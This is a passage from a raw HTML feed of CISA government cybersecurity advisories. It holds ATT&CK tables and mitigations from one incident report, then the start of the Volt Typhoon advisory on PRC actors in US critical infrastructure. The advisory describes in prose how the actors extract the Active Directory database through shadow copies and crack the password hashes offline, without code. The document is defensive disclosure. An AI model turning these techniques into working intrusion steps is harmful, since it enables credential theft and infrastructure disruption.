2866. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/002/" title="Valid Accounts: Domain Accounts">T1078.002</a></p>
2867. </td>
2868. <td>
2869. <p>The actor authenticated to multiple services from a compromised Global Domain Administrator account (<code>USER2</code>). The actor also authenticated to the Common Internet File Service (CIFS) on various endpoints.</p>
2870. </td>
2871. </tr>
2872. <tr>
2873. <td>
2874. <p>Valid Accounts: Cloud Accounts</p>
2875. </td>
2876. <td>
2877. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/004/" title="Valid Accounts: Cloud Accounts">T1078.004</a></p>
2878. </td>
2879. <td>
2880. <p>The actor used a compromised account (<code>USER2</code>) which was synced to both the on-premises AD and Azure AD, thus enabling administrative privileges to both the on-premises network and Azure tenant.</p>
2881. </td>
2882. </tr>
2883. </tbody>
2884. </table>
2885. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2886. <caption><em>Table 6: Credential Access</em></caption>
2887. <thead>
2888. <tr>
2889. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
2890. <th scope="col" role="columnheader"><strong>ID</strong></th>
2891. <th scope="col" role="columnheader"><strong>Use</strong></th>
2892. </tr>
2893. </thead>
2894. <tbody>
2895. <tr>
2896. <td>
2897. <p>Unsecured Credentials: Credentials in Files</p>
2898. </td>
2899. <td>
2900. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1552/001/" title="Unsecured Credentials: Credentials in Files">T1552.001</a></p>
2901. </td>
2902. <td>
2903. <p>The actor likely obtained <code>USER2</code> account credentials from the virtualized SharePoint server where they were locally stored.</p>
2904. </td>
2905. </tr>
2906. </tbody>
2907. </table>
2908. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2909. <caption><em>Table 7: Discovery</em></caption>
2910. <thead>
2911. <tr>
2912. <td><strong>Technique Title</strong></td>
2913. <td><strong>ID</strong></td>
2914. <td><strong>Use</strong></td>
2915. </tr>
2916. </thead>
2917. <tbody>
2918. <tr>
2919. <td>
2920. <p>Account Discovery: Domain Account</p>
2921. </td>
2922. <td>
2923. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a></p>
2924. </td>
2925. <td>
2926. <p>Through the VM connection, the actor executed LDAP queries of the AD.</p>
2927. </td>
2928. </tr>
2929. <tr>
2930. <td>
2931. <p>Remote System Discovery</p>
2932. </td>
2933. <td>
2934. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a></p>
2935. </td>
2936. <td>
2937. <p>Through the VM connection, the actor executed LDAP queries to collect user and host information.</p>
2938. </td>
2939. </tr>
2940. <tr>
2941. <td>
2942. <p>Domain Trust Discovery</p>
2943. </td>
2944. <td>
2945. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1482/" title="Domain Trust Discovery">T1482</a></p>
2946. </td>
2947. <td>
2948. <p>Through the VM connection, the actor executed LDAP queries to collect trust relationship information.</p>
2949. </td>
2950. </tr>
2951. <tr>
2952. <td>
2953. <p>File and Directory Discovery</p>
2954. </td>
2955. <td>
2956. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a></p>
2957. </td>
2958. <td>
2959. <p>The actor authenticated to the CIFS on various endpoints likely for the purpose of file, folder, and directory discovery.</p>
2960. </td>
2961. </tr>
2962. <tr>
2963. <td>
2964. <p>Network Service Discovery</p>
2965. </td>
2966. <td>
2967. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a></p>
2968. </td>
2969. <td>
2970. <p>The actor used the compromised <code>USER1</code> account to authenticate to four services, presumably for the purpose of network and service discovery.</p>
2971. </td>
2972. </tr>
2973. </tbody>
2974. </table>
2975. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2976. <caption><em>Table 8: Lateral Movement</em></caption>
2977. <thead>
2978. <tr>
2979. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
2980. <th scope="col" role="columnheader"><strong>ID</strong></th>
2981. <th scope="col" role="columnheader"><strong>Use</strong></th>
2982. </tr>
2983. </thead>
2984. <tbody>
2985. <tr>
2986. <td>
2987. <p>Remote Services</p>
2988. </td>
2989. <td>
2990. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1021/" title="Remote Services">T1021</a></p>
2991. </td>
2992. <td>
2993. <p>The actor connected from an unknown VM and authenticated to multiple services via the <code>USER1</code> account.</p>
2994. </td>
2995. </tr>
2996. <tr>
2997. <td>
2998. <p>Remote Services: Cloud Services</p>
2999. </td>
3000. <td>
3001. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1021/007/" title="Remote Services: Cloud Services">T1021.007</a></p>
3002. </td>
3003. <td>
3004. <p>The actor used the <code>USER2</code> account, which granted access to the Azure AD, as well as the on-premises AD.</p>
3005. </td>
3006. </tr>
3007. <tr>
3008. <td>
3009. <p>Remote Services: SMB/Windows Admin Shares</p>
3010. </td>
3011. <td>
3012. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1021/002/" title="Remote Services: SMB/Windows Admin Shares">T1021.002</a></p>
3013. </td>
3014. <td>
3015. <p>The actor used compromised accounts to interact with a remote network share using Server Message Block.</p>
3016. </td>
3017. </tr>
3018. </tbody>
3019. </table>
3020. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3021. <caption><em>Table 9: Collection</em></caption>
3022. <thead>
3023. <tr>
3024. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
3025. <th scope="col" role="columnheader"><strong>ID</strong></th>
3026. <th scope="col" role="columnheader"><strong>Use</strong></th>
3027. </tr>
3028. </thead>
3029. <tbody>
3030. <tr>
3031. <td>
3032. <p>Data from Information Repositories: SharePoint</p>
3033. </td>
3034. <td>
3035. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1213/002/" title="Data from Information Repositories: SharePoint">T1213.002</a></p>
3036. </td>
3037. <td>
3038. <p>The actor likely obtained the <code>USER2</code> account credentials from the virtualized SharePoint server managed by <code>USER1</code>.</p>
3039. </td>
3040. </tr>
3041. </tbody>
3042. </table>
3043. <h3><strong>MITIGATIONS</strong></h3>
3044. <p><strong>Note:</strong> These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST), which apply to all critical infrastructure organizations and network defenders. The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
3045. <h4><strong>Secure and Monitor Administrator Accounts</strong></h4>
3046. <p>The threat actor gained access to the network via compromised administrator accounts that did not have MFA enabled. The compromised <code>USER2</code> Global Domain Administrator account could have enabled the threat actor to move laterally from the on-premises environment to the Azure tenant. In response to the incident, the victim organization removed administrator privileges for <code>USER2</code>. Additionally, the victim organization disabled unnecessary administrator accounts and enabled MFA for all administrator accounts. To prevent similar compromises, CISA and MS-ISAC recommend the following:</p>
3047. <ul>
3048. <li><strong>Review current administrator accounts</strong> to determine their necessity and only maintain administrator accounts that are essential for network management. This will reduce the attack surface and focus efforts on the security and monitoring of necessary accounts.</li>
3049. <li><strong>Restrict the use of multiple administrator accounts</strong> for one user.</li>
3050. <li><strong>Create separate administrator accounts</strong> for on-premises and Azure environments to segment access.</li>
3051. <li><strong>Implement the principle of least privilege</strong> to decrease threat actor’s ability to access key network resources. Enable just-in-time and just enough access for administrator accounts to elevate the minimum necessary privileges for a limited time to complete tasks.</li>
3052. <li><strong>Use phishing-resistant multifactor authentication (MFA) </strong>[<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report">CPG 2.H</a>] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups.<strong> </strong>MFA should also be used for remote logins [<a href="https://attack.mitre.org/versions/v14/mitigations/M1032/" title="Multi-factor Authentication">M1032</a>]. For additional guidance on secure MFA configurations, visit CISA’s <a href="https://www.cisa.gov/MFA" title="More than a Password">More than a Password</a> webpage and read CISA’s <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">Implementing Phishing-Resistant MFA</a> fact sheet.</li>
3053. </ul>
3054. <h4><strong>Reduce Attack Surface</strong></h4>
3055. <p>Unnecessary accounts, software, and services in the network create additional vectors for a threat actor to compromise. CISA and MS-ISAC recommend the following:</p>
3056. <ul>
3057. <li><strong>Establish policy and procedure for the prompt removal of unnecessary accounts and groups</strong> from the enterprise, especially privileged accounts. Organizations should implement a robust and continuous user management process to ensure accounts of offboarded employees are removed and can no longer access the network.</li>
3058. <li><strong>Maintain a robust asset management policy</strong> through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
3059. <ul>
3060. <li>Determine the need and functionality of assets that require public internet exposure [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report">CPG 1.A</a>].</li>
3061. </ul>
3062. </li>
3063. <li><strong>Follow a routine patching cycle </strong>for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation.</li>
3064. <li><strong>Restrict personal devices from connecting to the network</strong>. Personal devices are not subject to the same group policies and security measures as domain joined devices.</li>
3065. </ul>
3066. <h4><strong>Evaluate Tenant Settings</strong></h4>
3067. <p>By default, in Azure AD all users can register and manage all aspects of applications they create. Users can also determine and approve what organizational data and services the application can access. These default settings can enable a threat actor to access sensitive information and move laterally in the network. In addition, users who create an Azure AD automatically become the Global Administrator for that tenant. This could allow a threat actor to escalate privileges to execute malicious actions. CISA and MS-ISAC recommend the following:</p>
3068. <ul>
3069. <li><strong>Evaluate current user permissions</strong> in the Azure tenant to restrict potentially harmful permissions including:
3070. <ul>
3071. <li>Restrict users’ ability to register applications. By default, all users in Azure AD can register and manage the applications they create and approve the data and services the application can access. If this is exploited, a threat actor can access sensitive information and move laterally in the network.</li>
3072. <li>Restrict non-administrators from creating tenants. Any user who creates an Azure AD automatically becomes the Global Administrator for that tenant. This creates an opportunity for a threat actor to escalate privileges to the highest privileged account.</li>
3073. <li>Restrict access to the Azure AD portal to administrators only. Users without administrative privileges cannot change settings, however, they can view user info, group info, device details, and user privileges. This would allow a threat actor to gather valuable information for malicious activities.</li>
3074. </ul>
3075. </li>
3076. </ul>
3077. <h4><strong>Create a Forensically Ready Organization</strong></h4>
3078. <ul>
3079. <li><strong>Collect access- and security-focused logs</strong> (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and virtual private network) for use in both detection and incident response activities [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report">CPG 2.T</a>].</li>
3080. <li><strong>Enable complete coverage of tools</strong>, including Endpoint Detection and Response (EDR), across the environment for thorough analysis of anomalous activity and remediation of potential vulnerabilities.</li>
3081. </ul>
3082. <h4><strong>Assess Security Configuration of Azure Environment</strong></h4>
3083. <p>CISA created the <a href="https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project" title="Secure Cloud and Business Applications">Secure Cloud and Business Applications (SCuBA)</a> assessment tool to help Federal Civilian Executive Branch (FCEB) agencies to verify that a M365 tenant configuration conforms to a minimal viable secure configuration baseline. Although the SCuBA assessment tool was developed for FCEB, other organizations can benefit from its output. CISA and MS-ISAC recommend the following:</p>
3084. <ul>
3085. <li><strong>Use tools that identify attack paths</strong>. This will enable defenders to identify common attack paths used by threat actors and shut them down before they are exploited.</li>
3086. <li><strong>Review the security recommendations list provided by Microsoft 365 Defender</strong>. Focus remediation on critical vulnerabilities on endpoints that are essential to mission execution and contain sensitive data.</li>
3087. </ul>
3088. <h4><strong>Evaluate Conditional Access Policies</strong></h4>
3089. <p>Conditional access policies require users who want to access a resource to complete an action. Conditional access policies also account for common signals, such as user or group memberships, IP location information, device, application, and risky sign-in behavior identified through integration with Azure AD Identity Protection.</p>
3090. <ul>
3091. <li><strong>Review current conditional access policies </strong>to determine if changes are necessary.</li>
3092. </ul>
3093. <h4><strong>Reset All Passwords and Establish Secure Password Policies</strong></h4>
3094. <p>In response to the incident, the victim organization reset passwords for all users.</p>
3095. <ul>
3096. <li><strong>Employ strong password management</strong> alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as user passwords expire [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report">CPG 2.A</a>],[<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report">CPG 2.B</a>],[<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report">CPG 2.C</a>].</li>
3097. <li><strong>Store credentials in a secure manner, </strong>such as with a credential manager, vault, or other privileged account management solution [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report">CPG 2.L</a>].</li>
3098. <li><strong>For products that come with default passwords,</strong> ask vendors how they plan to eliminate default passwords, as highlighted in <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-manufacturers-can-protect-customers-eliminating-default-passwords" title="Secure by Design Alert: How Manufacturers Can Protect Customers by Eliminating Default Passwords">CISA’s Secure by Design Alert: How Manufacturers Can Protect Customers by Eliminating Default Passwords</a>.</li>
3099. </ul>
3100. <h4><strong>Mitigations for Vendors</strong></h4>
3101. <p>CISA recommends that vendors incorporate <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">secure by design</a> principles and tactics into their practices, limiting the impact of threat actor techniques and strengthening the secure posture for their customers.</p>
3102. <ul>
3103. <li><strong>Prioritize secure by default configurations,</strong> such as eliminating default passwords and providing high-quality audit logs to customers with no additional configuration, at no extra charge. Secure by default configurations should be prioritized to eliminate the need for customer implementation of hardening guidance.</li>
3104. <li><strong>Immediately identify, mitigate, and update affected products</strong> that are not patched in accordance with CISA’s <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities (KEV) catalog</a>.</li>
3105. <li><strong>Implement multifactor authentication (MFA), </strong>ideally <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">phishing-resistant MFA</a>, as a default (rather than opt-in) feature for all products.</li>
3106. </ul>
3107. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
3108. <p>In addition to applying mitigations, CISA and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
3109. <p>To get started:</p>
3110. <ol>
3111. <li>Select an ATT&CK technique described in this advisory (see table 2-9).</li>
3112. <li>Align your security technologies against the technique.</li>
3113. <li>Test your technologies against the technique.</li>
3114. <li>Analyze your detection and prevention technologies’ performance.</li>
3115. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
3116. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
3117. </ol>
3118. <p>CISA and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
3119. <h3><strong>RESOURCES</strong></h3>
3120. <ul>
3121. <li>MS-ISAC: <a href="https://www.cisecurity.org/insights/blog/cyber-attack-defense-cis-benchmarks-cdm-mitre-attck" title="Cyber-Attack Defense: CIS Benchmarks + CDM + MITRE ATT&CK">Center for Internet Security (CIS) Cyber-Attack Defense: CIS Benchmarks + CDM + MITRE ATT&CK</a></li>
3122. </ul>
3123. <h3><strong>REFERENCES</strong></h3>
3124. <p>[1] <a href="https://www.cisa.gov/sites/default/files/2023-07/FY22-RVA-Analysis%20-%20Final_508c.pdf" title="CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments">CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments</a></p>
3125. <h3><strong>DISCLAIMER</strong></h3>
3126. <p>The information in this report is being provided “as is” for informational purposes only. CISA and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or MS-ISAC.</p>
3127. <h3><strong>VERSION HISTORY</strong></h3>
3128. <p>February 15, 2024: Initial version.</p>
3129. </description>
3130.  <pubDate>Wed, 14 Feb 2024 15:19:25 EST</pubDate>
3131.    <dc:creator>CISA</dc:creator>
3132.    <guid isPermaLink="false">/node/20941</guid>
3133.    </item>
3134. <item>
3135.  <title>PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure</title>
3136.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a</link>
3137.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
3138. <p>The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China (PRC) state-sponsored cyber actors are seeking to pre-position themselves on IT networks for disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States.</p>
3139. <p>CISA, NSA, FBI and the following partners are releasing this advisory to warn critical infrastructure organizations about this assessment, which is based on observations from the U.S. authoring agencies’ incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus):</p>
3140. <ul>
3141. <li>U.S. Department of Energy (DOE)</li>
3142. <li>U.S. Environmental Protection Agency (EPA)</li>
3143. <li>U.S. Transportation Security Administration (TSA)</li>
3144. <li>Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC)</li>
3145. <li>Canadian Centre for Cyber Security (CCCS), a part of the Communications Security Establishment (CSE)</li>
3146. <li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
3147. <li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
3148. </ul>
3149. <p>The U.S. authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations—primarily in <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/communications-sector" title="Communications Sector">Communications</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy Sector">Energy</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/transportation-systems-sector" title="Transportation Systems Sector">Transportation Systems</a>, and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Systems">Water and Wastewater Systems</a> Sectors—in the continental and non-continental United States and its territories, including Guam. Volt Typhoon’s choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions. The U.S. authoring agencies are concerned about the potential for these actors to use their network access for disruptive effects in the event of potential geopolitical tensions and/or military conflicts. CCCS assesses that the direct threat to Canada’s critical infrastructure from PRC state-sponsored actors is likely lower than that to U.S. infrastructure, but should U.S. infrastructure be disrupted, Canada would likely be affected as well, due to cross-border integration. ASD’s ACSC and NCSC-NZ assess Australian and New Zealand critical infrastructure, respectively, could be vulnerable to similar activity from PRC state-sponsored actors.</p>
3150. <p>As the authoring agencies have <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a" title="People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection">previously highlighted</a>, the use of living off the land (LOTL) techniques is a hallmark of Volt Typhoon actors’ malicious cyber activity when targeting critical infrastructure. The group also relies on valid accounts and leverage strong operational security, which combined, allows for long-term undiscovered persistence. In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years. Volt Typhoon actors conduct extensive pre-exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim’s environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise.</p>
3151. <p>The authoring agencies urge critical infrastructure organizations to apply the mitigations in this advisory and to hunt for similar malicious activity using the guidance herein provided, along with the recommendations found in joint guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">Identifying and Mitigating Living Off the Land Techniques</a>. These mitigations are primarily intended for IT and OT administrators in critical infrastructure organizations. Following the mitigations for prevention of or in response to an incident will help disrupt Volt Typhoon’s accesses and reduce the threat to critical infrastructure entities.</p>
3152. <p>If activity is identified, the authoring agencies strongly recommend that critical infrastructure organizations apply the incident response recommendations in this advisory and report the incident to the relevant agency (see Contact Information section).</p>
3153. <p>For additional information, see joint advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a" title="People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection">People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection</a> and U.S. Department of Justice (DOJ) press release <a href="https://www.justice.gov/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical" title="U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure">U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure</a>. For more information on PRC state-sponsored malicious cyber activity, see CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/china" title="People's Republic of China Cyber Threat">China Cyber Threat Overview and Advisories</a> webpage.</p>
3154. <p>Download the PDF version of this report:</p>
3155.  
3156.  
3157.  
3158.  
3159.  
3160. <div class="c-file">
3161.    <div class="c-file__download">
3162.    <a href="https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compromise_us_critical_infrastructure_3.pdf" class="c-file__link" target="_blank">AA24-038A PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure</a>
3163.    <span class="c-file__size">(PDF,       1.56 MB
3164.  )</span>
3165.  </div>
3166. </div>
3167. <p>Read the accompanying Malware Analysis Report: <a href="https://www.cisa.gov/news-events/analysis-reports/ar24-038a" title="MAR-10448362-1.v1 Volt Typhoon">MAR-10448362-1.v1 Volt Typhoon</a>.</p>
3168. <p>For a downloadable copy of indicators of compromise (IOCs), see:</p>
3169.  
3170.  
3171.  
3172.  
3173.  
3174. <div class="c-file">
3175.    <div class="c-file__download">
3176.    <a href="https://www.cisa.gov/sites/default/files/2024-02/MAR-10448362.c1.v1.CLEAR_stix2.json" class="c-file__link" target="_blank">AR24-038A STIX JSON</a>
3177.    <span class="c-file__size">(JSON,       59.40 KB
3178.  )</span>
3179.  </div>
3180. </div>
3181. <h3><strong>TECHNICAL DETAILS</strong></h3>
3182. <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK for Enterprise</a> framework, version 14. See <a href="#_Appendix_C:_MITRE">Appendix C: MITRE ATT&CK Tactics and Techniques</a> section for tables of the Volt Typhoon cyber threat actors’ activity mapped to MITRE ATT&CK<sup>®</sup> tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
3183. <h4><strong>Overview of Activity</strong></h4>
3184. <p>In May 2023, the authoring agencies—working with industry partners—disclosed information about activity attributed to Volt Typhoon (see joint advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a" title="People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection">People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection</a>). Since then, CISA, NSA, and FBI have determined that this activity is part of a broader campaign in which Volt Typhoon actors have successfully infiltrated the networks of critical infrastructure organizations in the continental and non-continental United States and its territories, including Guam.</p>
3185. <p>The U.S. authoring agencies have primarily observed compromises linked to Volt Typhoon in <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/communications-sector" title="Communications Sector">Communications</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy Sector">Energy</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/transportation-systems-sector" title="Transportation Systems Sector">Transportation Systems</a>, and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Systems">Water and Wastewater Systems</a> sector organizations’ IT networks. Some victims are smaller organizations with limited cybersecurity capabilities that provide critical services to larger organizations or key geographic locations.</p>
3186. <p>Volt Typhoon actors tailor their TTPs to the victim environment; however, the U.S. authoring agencies have observed the actors typically following the same pattern of behavior across identified intrusions. Their choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable the disruption of OT functions across multiple critical infrastructure sectors (see Figure 1).</p>
3187. <ol>
3188. <li><strong>Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization’s network architecture and operational protocols.</strong> This reconnaissance includes identifying network topologies, security measures, typical user behaviors, and key network and IT staff. The intelligence gathered by Volt Typhoon actors is likely leveraged to enhance their operational security. For example, in some instances, Volt Typhoon actors may have abstained from using compromised credentials outside of normal working hours to avoid triggering security alerts on abnormal account activities.</li>
3189. <li><strong>Volt Typhoon typically gains initial access to the IT network by exploiting known or zero-day vulnerabilities in public-facing network </strong>appliances (e.g., routers, virtual private networks [VPNs], and firewalls) and then connects to the victim’s network via VPN for follow-on activities.</li>
3190. <li><strong>Volt Typhoon aims to obtain administrator credentials within the network, often by exploiting privilege escalation vulnerabilities in the operating system or network services. </strong>In some cases, Volt Typhoon has obtained credentials insecurely stored on a public-facing network appliance.</li>
3191. <li><strong>Volt Typhoon uses valid administrator credentials to move laterally to the domain controller (DC) and other devices </strong>via remote access services such as Remote Desktop Protocol (RDP).</li>
3192. <li><strong>Volt Typhoon conducts discovery in the victim’s network, leveraging LOTL binaries for stealth</strong>. A key tactic includes using PowerShell to perform targeted queries on Windows event logs, focusing on specific users and periods. These queries facilitate the discreet extraction of security event logs into <code>.dat</code> files, allowing Volt Typhoon actors to gather critical information while minimizing detection. This strategy, blending in-depth pre-compromise reconnaissance with meticulous post-exploitation intelligence collection, underscores their sophisticated and strategic approach to cyber operations.</li>
3193. <li><strong>Volt Typhoon achieves full domain compromise by extracting the Active Directory database (</strong><code>NTDS.dit</code><strong>) from the DC.</strong> Volt Typhoon frequently employs the Volume Shadow Copy Service (VSS) using command-line utilities such as <code>vssadmin</code> to access <code>NTDS.dit</code>. The <code>NTDS.dit</code> file is a centralized repository that contains critical Active Directory data, including user accounts, passwords (in hashed form), and other sensitive data, which can be leveraged for further exploitation. This method entails the creation of a shadow copy—a point-in-time snapshot—of the volume hosting the <code>NTDS.dit</code> file. By leveraging this snapshot, Volt Typhoon actors effectively bypass the file locking mechanisms inherent in a live Windows environment, which typically prevent direct access to the <code>NTDS.dit</code> file while the domain controller is operational.</li>
3194. <li><strong>Volt Typhoon likely uses offline password cracking techniques to decipher these hashes.</strong> This process involves extracting the hashes from the <code>NTDS.dit</code> file and then applying various password cracking methods, such as brute force attacks, dictionary attacks, or more sophisticated techniques like rainbow tables to uncover the plaintext passwords. The successful decryption of these passwords allows Volt Typhoon actors to obtain elevated access and further infiltrate and manipulate the network.</li>
3195. <li><strong>Volt Typhoon uses elevated credentials for strategic network infiltration and additional discovery, often focusing on gaining capabilities to access OT assets. </strong>Volt Typhoon actors have been observed testing access to domain-joint OT assets using default OT vendor credentials, and in certain instances, they have possessed the capability to access OT systems whose credentials were compromised via <code>NTDS.dit</code> theft. This access enables potential disruptions, such as manipulating heating, ventilation, and air conditioning (HVAC) systems in server rooms or disrupting critical energy and water controls, leading to significant infrastructure failures (in some cases, Volt Typhoon actors had the capability to access camera surveillance systems at critical infrastructure facilities). In one confirmed compromise, Volt Typhoon actors moved laterally to a control system and were positioned to move to a second control system.</li>
3196. </ol>
3197.  
3198.  
3199.  
3200. <figure class="c-figure c-figure--image" role="group">
3201.  
3202.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%201%20-%20Typical%20Volt%20Typhoon%20Activity.png?itok=bELDFw9R" width="1024" height="538" alt="Figure 1: Typical Volt Typhoon Activity">
3203.  
3204.  
3205.  
3206. </div>
3207.      <figcaption class="c-figure__caption"><em>Figure 1: Typical Volt Typhoon Activity</em></figcaption>
3208.  </figure>
